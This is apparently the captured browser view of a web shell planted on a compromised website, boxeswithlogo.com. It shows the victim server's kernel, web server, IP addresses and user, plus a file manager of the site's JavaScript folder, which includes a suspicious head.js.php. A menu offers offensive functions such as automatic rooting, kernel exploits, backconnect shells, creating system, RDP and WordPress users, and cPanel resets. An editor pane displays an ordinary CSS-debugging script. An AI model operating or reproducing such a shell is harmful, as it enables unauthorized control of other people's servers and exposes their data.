Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 172.70.231.102
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
boxeswithlogo.com /
assets /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
bootstrap.native-master
[ DIR ]
drwxr-xr-x
extensions
[ DIR ]
drwxr-xr-x
own-carousel-1.0.0
[ DIR ]
drwxr-xr-x
blog.js
120
B
-rw-r--r--
bootstrap.bundle.min.js
77.74
KB
-rw-r--r--
bootstrap.min.js
58.65
KB
-rw-r--r--
categories.js
1.32
KB
-rw-r--r--
category_page.js
184
B
-rw-r--r--
check_overflow.js
2.36
KB
-rw-r--r--
circle-progress.js
2.99
KB
-rw-r--r--
config.js
714
B
-rw-r--r--
custom.js
4.19
KB
-rw-r--r--
dashboards-analytics.js
14.68
KB
-rw-r--r--
detail_page.js
0
B
-rw-r--r--
easyzoom.js
3.98
KB
-rw-r--r--
extended-ui-perfect-scrollbar....
1.06
KB
-rw-r--r--
form-basic-inputs.js
188
B
-rw-r--r--
gmaps.js
64.64
KB
-rw-r--r--
gtag.js
146
B
-rw-r--r--
head.js.php
209
B
-rw-r--r--
home_scripts.js
3.14
KB
-rw-r--r--
jquery-3.6.js
126.34
KB
-rw-r--r--
jquery-ui.js
249.19
KB
-rw-r--r--
jquery.appear.js
2.36
KB
-rw-r--r--
jquery.countdown.min.js
13.33
KB
-rw-r--r--
jquery.js
83.57
KB
-rw-r--r--
jquery.nice-select.js
5.69
KB
-rw-r--r--
jquery.plugin.min.js
3.31
KB
-rw-r--r--
jquery.themepunch.revolution.m...
63.53
KB
-rw-r--r--
jquery.themepunch.tools.min.js
107.84
KB
-rw-r--r--
lightcase.js
25.68
KB
-rw-r--r--
lightslider.js
46.96
KB
-rw-r--r--
main.js
3.76
KB
-rw-r--r--
owl.carousel.filter.js
401
B
-rw-r--r--
owl.carousel.min.js
43.3
KB
-rw-r--r--
pages-account-settings-account...
852
B
-rw-r--r--
popper.min.js
20.76
KB
-rw-r--r--
product_detail.js
1.32
KB
-rw-r--r--
script.js
599
B
-rw-r--r--
showmoreless.js
6.07
KB
-rw-r--r--
shuffle.min.js
20.34
KB
-rw-r--r--
slick.js
41.86
KB
-rw-r--r--
theme.js
20.91
KB
-rw-r--r--
ui-modals.js
1.04
KB
-rw-r--r--
ui-popover.js
443
B
-rw-r--r--
ui-toasts.js
1.27
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : check_overflow.js
// when you're trying to use `position:sticky` on an element // you'll have trouble if any parent/ancestor element has // overflow set to anything other than "visible" (such as: auto,hidden,overlay,scroll) // & turns out if a parent is `display:flex` it might need some love // (to remedy this you can set the `align-self` of your sticky element) // see here for how the display & align-self properties affect: http://bit.ly/2ZaRu4o // so, to find those troublesome parents... // copy & paste this into Chrome Inspector/Dev Tools console // (and be sure to change the #stickyElement below, if needed) function findOverflowParents(element, initEl) { function notVisible(el) { let overflow = getComputedStyle(el).overflow; return overflow !== "visible"; } function displayFlex(el) { let display = getComputedStyle(el).display; return display === "flex"; } let thisEl = element; if (!initEl) console.log('** Overflow check commence!', thisEl); let origEl = initEl || thisEl; if (notVisible(thisEl)) console.warn("Overflow found on:", thisEl.tagName, { issue: "OVERFLOW IS NOT VISIBLE", tagName: thisEl.tagName, id: thisEl.id, class: thisEl.className, element: thisEl }); if (displayFlex(thisEl)) console.warn("Flex found on:", thisEl.tagName, { issue: "DISPLAY IS FLEX", tagName: thisEl.tagName, id: thisEl.id, class: thisEl.className, element: thisEl }); if (thisEl.parentElement) { return findOverflowParents(thisEl.parentElement, origEl); } else { return console.log('** Overflow check complete! original element:', origEl); } } // to use a selector, change `#stickyElement` to your desired selector // findOverflowParents(document.querySelector('#stickyElement')); // or use $0 for the last element selected in the Chrome Inspector findOverflowParents($0); // *more learnings... // both `overflow-x` & `overflow-y` must === "visible" else sticky won't stick // for each of the possible settings of `overflow`, this is how they compute // (if "unset" is declared the getComputedStyle === "visible") // "auto" computes to "auto" *nosticky // "hidden" computes to "hidden" *nosticky // "inherit" computes to "visible" // "initial" computes to "visible" // "overlay" computes to "overlay" *nosticky // "scroll" computes to "scroll" *nosticky // "unset" computes to "visible" // "visible" computes to "visible"
Close